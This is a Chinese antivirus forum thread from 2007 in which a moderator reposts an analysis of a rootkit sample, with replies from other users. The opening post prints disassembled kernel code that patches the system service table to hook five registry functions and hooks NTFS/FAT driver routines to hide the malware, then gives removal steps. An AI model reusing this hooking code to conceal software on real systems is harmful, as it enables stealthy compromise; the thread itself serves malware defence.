微点交流论坛
» 游客:  注册 | 登录 | 帮助

 微点交流论坛 » 反病毒 » rootkit一只,雅虎助手的子孙  

 11  1/2  1  2  > 
作者:
标题: rootkit一只,雅虎助手的子孙
反黑先锋
版主

RUNWAY


积分 2901
发帖 2857
注册 2006-6-17
#1  rootkit一只,雅虎助手的子孙

文章转自:win32k


修改系统服务分发表原生api函数地址拦截与注册表相关的五条系统服务,挂钩fastfat.sys/ntfs.sys从个而使无法找到病毒

sub_1286E proc near

var_4= dword ptr -4

mov        edi, edi
push       ebp
mov        ebp, esp
push       ecx
cli
mov        eax, cr0
mov        [ebp+var_4], eax
and        eax, 0FFFEFFFFh
mov        cr0, eax
mov        ecx, ds:KeServiceDescriptorTable
mov        ecx, [ecx]
mov        eax, ds:ZwOpenKey
mov        eax, [eax+1]
mov        dword ptr [ecx+eax*4], offset loc_12192
mov        ecx, ds:KeServiceDescriptorTable
mov        ecx, [ecx]
mov        eax, ds:ZwEnumerateKey
mov        eax, [eax+1]
mov        dword ptr [ecx+eax*4], offset loc_1224A
mov        ecx, ds:KeServiceDescriptorTable
mov        ecx, [ecx]
mov        eax, ds:ZwEnumerateValueKey
mov        eax, [eax+1]
mov        dword ptr [ecx+eax*4], offset loc_12412
mov        ecx, ds:KeServiceDescriptorTable
mov        ecx, [ecx]
mov        eax, ds:ZwSetValueKey
mov        eax, [eax+1]
mov        dword ptr [ecx+eax*4], offset loc_125DA
mov        ecx, ds:KeServiceDescriptorTable
mov        eax, ds:ZwDeleteValueKey
mov        eax, [eax+1]
mov        ecx, [ecx]
mov        dword ptr [ecx+eax*4], offset loc_12730
mov        eax, [ebp+var_4]
mov        cr0, eax
sti
leave
retn



sub_11CB8 proc near

DestinationString= UNICODE_STRING ptr -8
arg_0= dword ptr     8

mov        edi, edi
push       ebp
mov        ebp, esp
push       ecx
push       ecx
push       ebx
push       esi
mov        esi, [ebp+arg_0]
mov        eax, esi
xor        ebx, ebx
sub        eax, ebx
push       edi
jz         short loc_11CD7

dec        eax
jnz        short loc_11CE6

offset s_FilesystemFas ; "\\FileSystem\\Fastfat"
jmp        short loc_11CDC

??觲L /
loc_11CD7:                 ; "\\FileSystem\\Ntfs"
push       offset s_FilesystemNtf

loc_11CDC:
lea        eax, [ebp+DestinationString]
push       eax                ; DestinationString
call       ds:RtlInitUnicodeString


loc_11CE6:
mov        eax, ds:IoDriverObjectType
mov        edi, esi
shl        edi, 2
lea        esi, dword_12E44[edi]
push       esi
push       ebx
push       ebx
mov        [esi], ebx
push       dword ptr [eax]
lea        eax, [ebp+DestinationString]
push       ebx
push       ebx
push       40h
push       eax
call       ds:ObReferenceObjectByName
cmp        eax, ebx
jl         short loc_11D4F

cli
mov        eax, cr0
mov        [ebp+arg_0], eax
and        eax, 0FFFEFFFFh
mov        cr0, eax
mov        ecx, [esi]
mov        eax, offset loc_11A06
add        ecx, 38h
xchg       eax, [ecx]
mov        ecx, [esi]
mov        dword_12E1C[edi], eax
mov        eax, offset word_11AF2
add        ecx, 68h
xchg       eax, [ecx]
mov        dword_12E30[edi], eax
mov        eax, [ebp+arg_0]
mov        cr0, eax
sti
xor        eax, eax


loc_11D4F:
pop        edi
pop        esi
pop        ebx
leave
retn       4
sub_11CB8 endp

样本来自卡饭,连驱动都没有放出来就被微点拦截了,苦命的娃



*
Rootkit解除方法,直供解除该病毒Rootkit



右键选择修复函数入口地址,不要用全部修复,否则在安装主防类型杀软的情况下会造成系统崩溃



把函数地址在Runtime2.sys全部修复,该后门Rootkit就解决了,其他就没有什么技术含量了

[ Last edited by 反黑先锋 on 2007-10-14 at 08:40 ]

※ ※ ※ 本文纯属【反黑先锋】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

荣先祥藏头诗《赞东方微点》
东风欣传好消息
方策独步世所稀
微妙玄机嵌主动
点睛灭毒堪神笔
2007-10-12 19:58
查看资料  发短消息   编辑帖子
qxbah
注册用户





积分 121
发帖 121
注册 2007-10-12
#2  

学习了,谢谢!!!

※ ※ ※ 本文纯属【qxbah】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2007-10-12 21:35
查看资料  发送邮件  发短消息   编辑帖子
屋顶上的解放军
新手上路





积分 4
发帖 4
注册 2007-10-12
#3  

看着很专业哦,我敢肯定楼主你发的东西你也看不懂吧。既然看不懂,就不要发这种看不懂的东西了。除非你把上面的数据翻译下来

※ ※ ※ 本文纯属【屋顶上的解放军】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2007-10-13 07:38
查看资料  发送邮件  发短消息   编辑帖子
qq2008444
银牌会员

职业潜水艇


积分 5373
发帖 5291
注册 2007-7-7
来自 兰·基亚斯 兰古拉王国
#4  



  Quote:
Originally posted by 屋顶上的解放军 at 2007-10-13 07:38:
看着很专业哦,我敢肯定楼主你发的东西你也看不懂吧。既然看不懂,就不要发这种看不懂的东西了。除非你把上面的数据翻译下来

....那些是汇编语言
怎么翻译?

※ ※ ※ 本文纯属【qq2008444】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

迅雷不及掩耳盗铃,以不变应万变不离其宗,成事不足挂齿,此物最相思风雨中,一屋不扫何以扫天下无敌,东边日出西边雨一直下,举头望明月几时有,呆若木鸡毛当令箭,杀鸡焉用牛刀小试,锋芒毕露春光,围魏救赵宝奎,Very good bye,八格牙鲁冰花,一泻千里共婵娟……
2007-10-13 14:56
查看资料  发送邮件  发短消息   编辑帖子
caibin870
高级用户




积分 856
发帖 851
注册 2007-9-10
来自 广州
#5  

进来看看,学习一下

※ ※ ※ 本文纯属【caibin870】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2007-10-13 14:59
查看资料  发送邮件  发短消息   编辑帖子
微点专家
版主

Weizi


积分 11554
发帖 11458
注册 2006-8-27
来自 贵阳
#6  



  Quote:
Originally posted by qq2008444 at 2007-10-13 14:56:

....那些是汇编语言
怎么翻译?

你懂吗

※ ※ ※ 本文纯属【微点专家】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2007-10-14 00:23
查看资料  发送邮件  访问主页  发短消息  QQ   编辑帖子
黄金小马甲
新手上路





积分 1
发帖 1
注册 2007-10-14
#7  

学习了,那个工具手清病毒挺好用的

※ ※ ※ 本文纯属【黄金小马甲】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2007-10-14 03:33
查看资料  发短消息   编辑帖子
zqd6789
注册用户




积分 194
发帖 194
注册 2006-12-8
#8  

冰刃是个好工具,可不会使用就等于没用了,还是寄希望于微点一步到位啦.........

※ ※ ※ 本文纯属【zqd6789】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2007-10-14 04:44
查看资料  发短消息   编辑帖子
sidineyqiao
版主

体育娱乐休闲版主


积分 1697
发帖 1584
注册 2007-8-2
来自 庆祝微点上市一周年624-630
#9  

我懂。。呵呵

※ ※ ※ 本文纯属【sidineyqiao】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

主动出击,防御未然!


www.micropoint.cn
bbs.micropoint.cn
2007-12-10 10:46
查看资料  发短消息   编辑帖子
aaa2117
新手上路





积分 20
发帖 20
注册 2007-12-9
#10  

学习了

※ ※ ※ 本文纯属【aaa2117】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

http://blog.sina.com.cn/aaa2117
微点爱好者QQ群:12314796
2007-12-10 13:12
查看资料  发短消息   编辑帖子
 11  1/2  1  2  > 



论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏


[ 联系我们 - 东方微点 ]

北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司

闽ICP备05030815号